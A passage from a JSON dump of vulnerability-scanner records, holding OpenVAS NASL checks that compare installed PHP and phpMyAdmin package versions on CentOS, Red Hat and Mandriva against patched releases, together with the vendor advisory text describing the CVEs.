NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-03T10:54:47", "description": "Check for the Version of php", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "CentOS Update for php CESA-2010:0919 centos4 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870", "CVE-2009-5016", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2018-01-02T00:00:00", "id": "OPENVAS:1361412562310880456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880456", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2010:0919 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n An input validation flaw was discovered in the PHP session serializer. If a\n PHP script generated session variable names from untrusted user input, a\n remote attacker could use this flaw to inject an arbitrary variable into\n the PHP session. (CVE-2010-3065)\n \n An information leak flaw was discovered in the PHP var_export() function\n implementation. If some fatal error occurred during the execution of this\n function (such as the exhaustion of memory or script execution time limit),\n part of the function's output was sent to the user as script output,\n possibly leading to the disclosure of sensitive information.\n (CVE-2010-2531)\n \n A numeric truncation error and an input validation flaw were found in the\n way the PHP utf8_decode() function decoded partial multi-byte sequences\n for some multi-byte encodings, sending them to output without them being\n escaped. An attacker could use these flaws to perform a cross-site\n scripting attack. (CVE-2009-5016, CVE-2010-3870)\n \n It was discovered that the PHP lcg_value() function used insufficient\n entropy to seed the pseudo-random number generator. A remote attacker could\n possibly use this flaw to predict values returned by the function, which\n are used to generate session identifiers by default. This update changes\n the function's implementation to use more entropy during seeding.\n (CVE-2010-1128)\n \n It was discovered that the PHP fnmatch() function did not restrict the\n length of the pattern argument. A remote attacker could use this flaw to\n crash the PHP interpreter where a script used fnmatch() on untrusted\n matching patterns. (CVE-2010-1917)\n \n A NULL pointer dereference flaw was discovered in the PHP XML-RPC\n extension. A malicious XML-RPC client or server could use this flaw to\n crash the PHP interpreter via a specially-crafted XML-RPC request.\n (CVE-2010-0397)\n \n All php users should upgrade to these updated packages, which contain\n backported patches to resolve these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"php on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-December/017205.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880456\");\n script_version(\"$Revision: 8269 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-02 08:28:22 +0100 (Tue, 02 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2010:0919\");\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_name(\"CentOS Update for php CESA-2010:0919 centos4 i386\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for php CESA-2010:0919 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870", "CVE-2009-5016", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310880633", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880633", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2010:0919 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2010-November/017198.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880633\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2010:0919\");\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_name(\"CentOS Update for php CESA-2010:0919 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"php on CentOS 5\");\n script_tag(name:\"insight\", value:\"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n An input validation flaw was discovered in the PHP session serializer. If a\n PHP script generated session variable names from untrusted user input, a\n remote attacker could use this flaw to inject an arbitrary variable into\n the PHP session. (CVE-2010-3065)\n\n An information leak flaw was discovered in the PHP var_export() function\n implementation. If some fatal error occurred during the execution of this\n function (such as the exhaustion of memory or script execution time limit),\n part of the function's output was sent to the user as script output,\n possibly leading to the disclosure of sensitive information.\n (CVE-2010-2531)\n\n A numeric truncation error and an input validation flaw were found in the\n way the PHP utf8_decode() function decoded partial multi-byte sequences\n for some multi-byte encodings, sending them to output without them being\n escaped. An attacker could use these flaws to perform a cross-site\n scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\n It was discovered that the PHP lcg_value() function used insufficient\n entropy to seed the pseudo-random number generator. A remote attacker could\n possibly use this flaw to predict values returned by the function, which\n are used to generate session identifiers by default. This update changes\n the function's implementation to use more entropy during seeding.\n (CVE-2010-1128)\n\n It was discovered that the PHP fnmatch() function did not restrict the\n length of the pattern argument. A remote attacker could use this flaw to\n crash the PHP interpreter where a script used fnmatch() on untrusted\n matching patterns. (CVE-2010-1917)\n\n A NULL pointer dereference flaw was discovered in the PHP XML-RPC\n extension. A malicious XML-RPC client or server could use this flaw to\n crash the PHP interpreter via a specially-crafted XML-RPC request.\n (CVE-2010-0397)\n\n All php users should upgrade to these updated packages, which contain\n backported patches to resolve these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-12-15T11:58:07", "description": "Check for the Version of php", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "CentOS Update for php CESA-2010:0919 centos4 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870", "CVE-2009-5016", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2017-12-15T00:00:00", "id": "OPENVAS:880456", "href": "http://plugins.openvas.org/nasl.php?oid=880456", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2010:0919 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n An input validation flaw was discovered in the PHP session serializer. If a\n PHP script generated session variable names from untrusted user input, a\n remote attacker could use this flaw to inject an arbitrary variable into\n the PHP session. (CVE-2010-3065)\n \n An information leak flaw was discovered in the PHP var_export() function\n implementation. If some fatal error occurred during the execution of this\n function (such as the exhaustion of memory or script execution time limit),\n part of the function's output was sent to the user as script output,\n possibly leading to the disclosure of sensitive information.\n (CVE-2010-2531)\n \n A numeric truncation error and an input validation flaw were found in the\n way the PHP utf8_decode() function decoded partial multi-byte sequences\n for some multi-byte encodings, sending them to output without them being\n escaped. An attacker could use these flaws to perform a cross-site\n scripting attack. (CVE-2009-5016, CVE-2010-3870)\n \n It was discovered that the PHP lcg_value() function used insufficient\n entropy to seed the pseudo-random number generator. A remote attacker could\n possibly use this flaw to predict values returned by the function, which\n are used to generate session identifiers by default. This update changes\n the function's implementation to use more entropy during seeding.\n (CVE-2010-1128)\n \n It was discovered that the PHP fnmatch() function did not restrict the\n length of the pattern argument. A remote attacker could use this flaw to\n crash the PHP interpreter where a script used fnmatch() on untrusted\n matching patterns. (CVE-2010-1917)\n \n A NULL pointer dereference flaw was discovered in the PHP XML-RPC\n extension. A malicious XML-RPC client or server could use this flaw to\n crash the PHP interpreter via a specially-crafted XML-RPC request.\n (CVE-2010-0397)\n \n All php users should upgrade to these updated packages, which contain\n backported patches to resolve these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"php on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-December/017205.html\");\n script_id(880456);\n script_version(\"$Revision: 8130 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-15 07:31:09 +0100 (Fri, 15 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2010:0919\");\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_name(\"CentOS Update for php CESA-2010:0919 centos4 i386\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:35", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-08-18T00:00:00", "type": "openvas", "title": "Mandriva Update for phpmyadmin MDVSA-2011:124 (phpmyadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2642", "CVE-2011-2505", "CVE-2011-2718", "CVE-2011-2643", "CVE-2011-2506", "CVE-2011-2719", "CVE-2011-2507"], "modified": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310831441", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831441", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for phpmyadmin MDVSA-2011:124 (phpmyadmin)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-08/msg00006.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831441\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-18 14:57:45 +0200 (Thu, 18 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"MDVSA\", value:\"2011:124\");\n script_cve_id(\"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\", \"CVE-2011-2642\", \"CVE-2011-2643\", \"CVE-2011-2718\", \"CVE-2011-2719\");\n script_name(\"Mandriva Update for phpmyadmin MDVSA-2011:124 (phpmyadmin)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpmyadmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_mes5\");\n script_tag(name:\"affected\", value:\"phpmyadmin on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities has been discovered and corrected in\n phpmyadmin:\n\n libraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication\n feature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1\n assigns values to arbitrary parameters referenced in the query string,\n which allows remote attackers to modify the SESSION superglobal array\n via a crafted request, related to a remote variable manipulation\n vulnerability. (CVE-2011-2505).\n\n setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2\n and 3.4.x before 3.4.3.1 does not properly restrict the presence of\n comment closing delimiters, which allows remote attackers to conduct\n static code injection attacks by leveraging the ability to modify\n the SESSION superglobal array (CVE-2011-2506).\n\n libraries/server_synchronize.lib.php in the Synchronize implementation\n in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 